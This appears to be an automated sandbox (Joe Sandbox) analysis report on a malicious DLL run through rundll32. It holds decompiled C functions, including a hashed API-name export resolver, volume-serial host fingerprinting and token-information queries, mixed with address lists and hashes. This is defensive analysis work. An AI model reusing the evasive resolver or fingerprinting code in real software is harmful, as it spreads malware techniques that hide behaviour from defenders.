                                                                                                                                                                                                                                                                            0x1000a828
                                                                                                                                                                                                                                                                            0x1000a828
                                                                                                                                                                                                                                                                            0x1000a82a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a837
                                                                                                                                                                                                                                                                            0x1000a83c
                                                                                                                                                                                                                                                                            0x1000a841
                                                                                                                                                                                                                                                                            0x1000a844
                                                                                                                                                                                                                                                                            0x1000a84e
                                                                                                                                                                                                                                                                            0x1000a855
                                                                                                                                                                                                                                                                            0x1000a855
                                                                                                                                                                                                                                                                            0x1000a85d
                                                                                                                                                                                                                                                                            0x1000a863
                                                                                                                                                                                                                                                                            0x1000a868
                                                                                                                                                                                                                                                                            0x1000a86a
                                                                                                                                                                                                                                                                            0x1000a86f
                                                                                                                                                                                                                                                                            0x1000a87a
                                                                                                                                                                                                                                                                            0x1000a881
                                                                                                                                                                                                                                                                            0x1000a883
                                                                                                                                                                                                                                                                            0x1000a888
                                                                                                                                                                                                                                                                            0x1000a88d
                                                                                                                                                                                                                                                                            0x1000a88f
                                                                                                                                                                                                                                                                            0x1000a893
                                                                                                                                                                                                                                                                            0x1000a893
                                                                                                                                                                                                                                                                            0x1000a893
                                                                                                                                                                                                                                                                            0x1000a88f
                                                                                                                                                                                                                                                                            0x1000a883
                                                                                                                                                                                                                                                                            0x1000a894
                                                                                                                                                                                                                                                                            0x1000a897
                                                                                                                                                                                                                                                                            0x1000a899
                                                                                                                                                                                                                                                                            0x1000a89b
                                                                                                                                                                                                                                                                            0x1000a89d
                                                                                                                                                                                                                                                                            0x1000a8a6
                                                                                                                                                                                                                                                                            0x1000a8a6
                                                                                                                                                                                                                                                                            0x1000a8ac
                                                                                                                                                                                                                                                                            0x1000a8b4
                                                                                                                                                                                                                                                                            0x1000a8b7
                                                                                                                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                                                                                                                            0x1000a8c5
                                                                                                                                                                                                                                                                            0x1000a8c6
                                                                                                                                                                                                                                                                            0x1000a8c9
                                                                                                                                                                                                                                                                            0x1000a8c9
                                                                                                                                                                                                                                                                            0x1000a8d5
                                                                                                                                                                                                                                                                            0x1000a8d6
                                                                                                                                                                                                                                                                            0x1000a8d9
                                                                                                                                                                                                                                                                            0x1000a8dc
                                                                                                                                                                                                                                                                            0x1000a8df
                                                                                                                                                                                                                                                                            0x1000a8e1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a8e1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a815
                                                                                                                                                                                                                                                                            0x1000a7d2
                                                                                                                                                                                                                                                                            0x1000a7d7
                                                                                                                                                                                                                                                                            0x1000a7dd
                                                                                                                                                                                                                                                                            0x1000a7e5
                                                                                                                                                                                                                                                                            0x1000a7e5
                                                                                                                                                                                                                                                                            0x1000a7e5
                                                                                                                                                                                                                                                                            0x1000a7e8
                                                                                                                                                                                                                                                                            0x1000a7ec
                                                                                                                                                                                                                                                                            0x1000a7ed
                                                                                                                                                                                                                                                                            0x1000a7f1
                                                                                                                                                                                                                                                                            0x1000a7f5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a7fb
                                                                                                                                                                                                                                                                            0x1000a7df
                                                                                                                                                                                                                                                                            0x1000a7e3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a7e3

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7B6
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7F5
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$memset
                                                                                                                                                                                                                                                                            • String ID: appear$endless
                                                                                                                                                                                                                                                                            • API String ID: 3887242890-2536025861
                                                                                                                                                                                                                                                                            • Opcode ID: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
                                                                                                                                                                                                                                                                            • Instruction ID: 43acfddb437bd695ff901fa8aaf7fd7f1202ceeadee2dfa3d6f986462457d3c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2751A335D002199FEF01DBA4C9859ED77F5EF497D0F254269E900B7249DB309D82CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 245 100093b8-100093cf 246 100093d1-100093f9 245->246 247 1000942c 245->247 246->247 248 100093fb-1000941e call 1000cf09 call 1000e6e9 246->248 249 1000942e-10009432 247->249 254 10009420-1000942a 248->254 255 10009433-1000944a 248->255 254->247 254->248 256 100094a0-100094a2 255->256 257 1000944c-10009454 255->257 256->249 257->256 258 10009456 257->258 259 10009458-1000945e 258->259 260 10009460-10009462 259->260 261 1000946e-1000947f 259->261 260->261 262 10009464-1000946c 260->262 263 10009481-10009482 261->263 264 10009484-10009490 LoadLibraryA 261->264 262->259 262->261 263->264 264->247 265 10009492-1000949c GetProcAddress 264->265 265->247 266 1000949e 265->266 266->249
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E100093B8(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t58;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                                                            				intOrPtr _t63;
                                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                                            				char _t70;
                                                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                                                            				CHAR* _t80;
                                                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t75 = __ecx;
                                                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                                                            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                                                                                                            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                                                                                                            				if(_t41 == 0) {
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t62 = _t41 + __ecx;
                                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                                                                                                            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                                                                                            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                                                                                                            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                                                                                                            				_t47 = 0;
                                                                                                                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v16 = _t63;
                                                                                                                                                                                                                                                                            				if(_t63 == 0) {
                                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t49 = E1000E6E9( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000CF09( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                                                                                                            					_t51 = _v8;
                                                                                                                                                                                                                                                                            					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t73 = _v20;
                                                                                                                                                                                                                                                                            					_t47 = _t51 + 1;
                                                                                                                                                                                                                                                                            					_v8 = _t47;
                                                                                                                                                                                                                                                                            					if(_t47 < _v16) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                                                                                                            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                                                                                                            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                                                                                                            					return _t80;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t56 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t70 = _t80[_t56];
                                                                                                                                                                                                                                                                            						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                                                                                                            						_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                            						if(_t56 < 0x40) {
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                                                                                                            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                                                                                                            					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                                                                                                            						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                                                                                                            					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                                                                                                            					if(_t58 == 0) {
                                                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                                                                                                            					if(_t59 == 0) {
                                                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t59;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                                                            0x100093c1
                                                                                                                                                                                                                                                                            0x100093c3
                                                                                                                                                                                                                                                                            0x100093c6
                                                                                                                                                                                                                                                                            0x100093c9
                                                                                                                                                                                                                                                                            0x100093cf
                                                                                                                                                                                                                                                                            0x1000942c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000942c
                                                                                                                                                                                                                                                                            0x100093d1
                                                                                                                                                                                                                                                                            0x100093dc
                                                                                                                                                                                                                                                                            0x100093df
                                                                                                                                                                                                                                                                            0x100093e4
                                                                                                                                                                                                                                                                            0x100093e9
                                                                                                                                                                                                                                                                            0x100093ec
                                                                                                                                                                                                                                                                            0x100093ee
                                                                                                                                                                                                                                                                            0x100093f1
                                                                                                                                                                                                                                                                            0x100093f4
                                                                                                                                                                                                                                                                            0x100093f9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100093fb
                                                                                                                                                                                                                                                                            0x100093fb
                                                                                                                                                                                                                                                                            0x1000940d
                                                                                                                                                                                                                                                                            0x1000941a
                                                                                                                                                                                                                                                                            0x1000941e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009420
                                                                                                                                                                                                                                                                            0x10009423
                                                                                                                                                                                                                                                                            0x10009424
                                                                                                                                                                                                                                                                            0x1000942a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000942a
                                                                                                                                                                                                                                                                            0x10009441
                                                                                                                                                                                                                                                                            0x10009446
                                                                                                                                                                                                                                                                            0x1000944a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009456
                                                                                                                                                                                                                                                                            0x10009456
                                                                                                                                                                                                                                                                            0x10009458
                                                                                                                                                                                                                                                                            0x10009458
                                                                                                                                                                                                                                                                            0x1000945e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009464
                                                                                                                                                                                                                                                                            0x10009468
                                                                                                                                                                                                                                                                            0x1000946c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000946c
                                                                                                                                                                                                                                                                            0x10009472
                                                                                                                                                                                                                                                                            0x1000947a
                                                                                                                                                                                                                                                                            0x1000947f
                                                                                                                                                                                                                                                                            0x10009482
                                                                                                                                                                                                                                                                            0x10009482
                                                                                                                                                                                                                                                                            0x10009484
                                                                                                                                                                                                                                                                            0x10009488
                                                                                                                                                                                                                                                                            0x10009490
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009494
                                                                                                                                                                                                                                                                            0x1000949c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000949c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 10009488
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 10009494
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                            • String ID: .dll
                                                                                                                                                                                                                                                                            • API String ID: 2574300362-2738580789
                                                                                                                                                                                                                                                                            • Opcode ID: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
                                                                                                                                                                                                                                                                            • Instruction ID: 5f7767ba692d8623afc008dab85022027fb0ad9a9831507a7d1254af1b27c92f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6631F175A002158BEF54CFA9D880AAEBBF5FF45384F2444A9D845E734AD730ED82CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                                                            			E1000D131(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				WCHAR* _v16;
                                                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                                                            				short _v1040;
                                                                                                                                                                                                                                                                            				short _v1552;
                                                                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                                                                            				WCHAR* _t26;
                                                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				WCHAR* _t42;
                                                                                                                                                                                                                                                                            				WCHAR* _t57;
                                                                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t42 = __edx;
                                                                                                                                                                                                                                                                            				_t57 = __ecx;
                                                                                                                                                                                                                                                                            				E1000936A(__edx, 0, 0x100);
                                                                                                                                                                                                                                                                            				_v12 = 0x100;
                                                                                                                                                                                                                                                                            				_t23 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
                                                                                                                                                                                                                                                                            				E1000C229(__edx,  &_v528, 0x100);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
                                                                                                                                                                                                                                                                            				_t26 = E100091B2(__edx,  &_v528);
                                                                                                                                                                                                                                                                            				_v16 = _t26;
                                                                                                                                                                                                                                                                            				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				_v8 = _v8 &  ~_t28;
                                                                                                                                                                                                                                                                            				E10009E2E( &_v16);
                                                                                                                                                                                                                                                                            				_t32 = E1000CF22(_t42);
                                                                                                                                                                                                                                                                            				E1000C172( &(_t42[E1000CF22(_t42)]), 0x100 - _t32, L"%u", _v8);
                                                                                                                                                                                                                                                                            				lstrcatW(_t42, _t57);
                                                                                                                                                                                                                                                                            				_t37 = E1000CF22(_t42);
                                                                                                                                                                                                                                                                            				_v12 = _t37;
                                                                                                                                                                                                                                                                            				CharUpperBuffW(_t42, _t37);
                                                                                                                                                                                                                                                                            				return E1000E6E9(_t42, E1000CF22(_t42) + _t39, 0);
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x1000d13a
                                                                                                                                                                                                                                                                            0x1000d146
                                                                                                                                                                                                                                                                            0x1000d14c
                                                                                                                                                                                                                                                                            0x1000d14e
                                                                                                                                                                                                                                                                            0x1000d156
                                                                                                                                                                                                                                                                            0x1000d164
                                                                                                                                                                                                                                                                            0x1000d169
                                                                                                                                                                                                                                                                            0x1000d178
                                                                                                                                                                                                                                                                            0x1000d17d
                                                                                                                                                                                                                                                                            0x1000d184
                                                                                                                                                                                                                                                                            0x1000d191
                                                                                                                                                                                                                                                                            0x1000d1ab
                                                                                                                                                                                                                                                                            0x1000d1b0
                                                                                                                                                                                                                                                                            0x1000d1b2
                                                                                                                                                                                                                                                                            0x1000d1b9
                                                                                                                                                                                                                                                                            0x1000d1c9
                                                                                                                                                                                                                                                                            0x1000d1da
                                                                                                                                                                                                                                                                            0x1000d1e4
                                                                                                                                                                                                                                                                            0x1000d1ec
                                                                                                                                                                                                                                                                            0x1000d1f3
                                                                                                                                                                                                                                                                            0x1000d1f6
                                                                                                                                                                                                                                                                            0x1000d213

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D1AB
                                                                                                                                                                                                                                                                              • Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00000114), ref: 1000D1E4
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 1000D1F6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3467380347-0
                                                                                                                                                                                                                                                                            • Opcode ID: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
                                                                                                                                                                                                                                                                            • Instruction ID: e401c8bce79da03c818e680b56469f360460cf51717d93477c68a4169e5f006f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E2192B6A00218BFE710DBA4DC8AFEE77BDEB44350F104579F505D7186EA74AE448B60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 317 1000dc93-1000dcb3 GetTokenInformation 318 1000dcb5-1000dcbe GetLastError 317->318 319 1000dcf9 317->319 318->319 321 1000dcc0-1000dcd0 call 100091e7 318->321 320 1000dcfb-1000dcff 319->320 324 1000dcd2-1000dcd4 321->324 325 1000dcd6-1000dce9 GetTokenInformation 321->325 324->320 325->319 326 1000dceb-1000dcf7 call 10009203 325->326 326->324
                                                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                                                            			E1000DC93(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                                                            				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(_t22);
                                                                                                                                                                                                                                                                            				_push(_t22);
                                                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                                                                                                                            				_t20 = _t22;
                                                                                                                                                                                                                                                                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					_t12 = _t31;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t31 = E100091E7(_v8);
                                                                                                                                                                                                                                                                            					_v12 = _t31;
                                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							E10009203( &_v12, _t16);
                                                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t12;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x1000dc96
                                                                                                                                                                                                                                                                            0x1000dc97
                                                                                                                                                                                                                                                                            0x1000dc9e
                                                                                                                                                                                                                                                                            0x1000dca6
                                                                                                                                                                                                                                                                            0x1000dcaa
                                                                                                                                                                                                                                                                            0x1000dcb3
                                                                                                                                                                                                                                                                            0x1000dcf9
                                                                                                                                                                                                                                                                            0x1000dcf9
                                                                                                                                                                                                                                                                            0x1000dcc0
                                                                                                                                                                                                                                                                            0x1000dcc8
                                                                                                                                                                                                                                                                            0x1000dcca
                                                                                                                                                                                                                                                                            0x1000dcd0
                                                                                                                                                                                                                                                                            0x1000dce9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dceb
                                                                                                                                                                                                                                                                            0x1000dcf0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dcf6
                                                                                                                                                                                                                                                                            0x1000dcd2
                                                                                                                                                                                                                                                                            0x1000dcd2
                                                                                                                                                                                                                                                                            0x1000dcd2
                                                                                                                                                                                                                                                                            0x1000dcd2
                                                                                                                                                                                                                                                                            0x1000dcd0
                                                                                                                                                                                                                                                                            0x1000dcff

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCE4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
